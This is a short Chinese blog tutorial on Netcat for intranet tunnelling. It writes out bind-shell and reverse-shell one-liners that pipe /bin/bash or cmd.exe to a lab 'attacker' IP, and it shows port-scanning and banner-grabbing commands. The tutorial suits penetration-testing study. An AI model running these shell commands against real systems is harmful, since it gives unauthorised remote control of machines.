内网隧道代理

随笔2个月前发布 小莹
37 0 0

Netcat反弹shell

一:正向代理

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军&刀

windows机器 nc64.exe -lvvp 1111 -e C:WindowsSystem32cmd.exe 
linux机器 nc -lvvp 1111 -e /bin/bash

攻击机机

nc64.exe 192.168.41.130 1111

得到正向代理shell

二:反向代理

攻击者机器 192.168.41.20 不能直接访问服务器,但是服务器 192.168.41.130 可以访问攻击者的机器,这个时候可以使用反向shell

在攻击者机器运行

#监听1111端口 nc64.exe -lvvp 1111

在服务器上运行(反弹到攻击机上)

windos机器 nc64.exe -e C:WindowsSystem32cmd.exe 192.168.41.20 1111 
linux机器 nc -e /bin/bash 192.168.41.20 1111

三:Netcat的其他用法

Banner 的抓取

靶机运行着ssh服务,可以查看服务的版本

nc64.exe -nv IP Port

端口探测

可以查看端口的开放情况,可以看到我们目标服务器的80端口没有开放

nc64.exe -v IP Port

多端口扫描

可以查看多端口是否开放和允许的服务

nc -v -z IP Port[1]-Port[65535]

端口监听

监听端口,当访问该端口会输出该信息

nc64.exe -l -p Port

文件传输

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...